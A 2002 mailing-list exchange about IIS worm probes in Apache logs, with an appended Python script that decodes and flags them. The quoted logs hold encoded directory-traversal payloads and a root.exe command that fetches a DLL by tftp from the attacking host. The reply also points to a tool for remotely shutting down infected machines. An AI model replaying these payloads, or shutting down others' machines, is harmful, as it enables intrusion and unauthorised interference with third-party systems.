Ibly Piblo wrote:

>I am getting strange hits to my web server,
>I don't like it and I wish to know how
>to stop them from slipping past my defenses.
>
>I try using ipchains, most addresses are
>blocked, but for reasons I can't figure out,
>this address 65.192.23.150 keeps showing up.
>
>I don't understand it, if ipchains,
>/etc/hosts.deny can't block it, what can?
>
>Do I send back a command to shut down
>their server?
>
>How do I get the point across?
>
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 358 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET
>/scripts/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET
>/scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll
>HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
>/scripts/httpodbc.dll HTTP/1.0" 404 307 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
>/MSADC/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
>/MSADC/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll
>HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
>/MSADC/httpodbc.dll HTTP/1.0" 404 305 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
>"-"
>65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
>"-"
>65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 358 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "
>

That is no DoS attack--tis the wailing of IIS infected trying to spread 
its misery.  

Go here...  Tis time to meet a friend.

http://pfortin.com/Linux/MSVTS/

And yes the remote shutdown is there.

While you are at it, you might want to make some more new friends

http://plf.zarb.org

Civileme
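
The probes quoted above can be triaged mechanically. As an added example (not part of the original thread), this Python script decodes the nested percent-encoding, flags requests for `cmd.exe`, `root.exe` or `httpodbc.dll`, and separates probes the server rejected (4xx) from responses that warrant a closer look; the sample log is constructed from entries in the question plus one benign line from a documentation address.

```python
import re
from urllib.parse import unquote

# Constructed sample (Apache combined format), modelled on the quoted entries,
# plus one benign request from a documentation address.
SAMPLE_LOG = """\
65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 308 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
192.0.2.10 - - [28/Jul/2002:18:02:00 -0500] "GET /index.html HTTP/1.0" 200 1024 "-" "-"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
# File names these probes ask for (all appear in the quoted log).
PROBE_RE = re.compile(r'(?:cmd|root)\.exe|httpodbc\.dll', re.IGNORECASE)

def fully_decode(target, max_rounds=5):
    """Percent-decode repeatedly so %255c, %25%35%63 and %%35%63 all collapse."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def summarize(log_text):
    """Per source IP: probe count, how many got 4xx, and which ones did not."""
    report = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, status = m.group(1), fully_decode(m.group(2)), int(m.group(3))
        if not PROBE_RE.search(target):
            continue
        entry = report.setdefault(ip, {"probes": 0, "rejected": 0, "review": []})
        entry["probes"] += 1
        if 400 <= status < 500:
            entry["rejected"] += 1
        else:
            entry["review"].append((status, target))
    return report

if __name__ == "__main__":
    for ip, entry in summarize(SAMPLE_LOG).items():
        print(ip, entry)
```

Entries under `review` are the ones to check by hand: a non-4xx status means the server answered the request with something other than a rejection.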
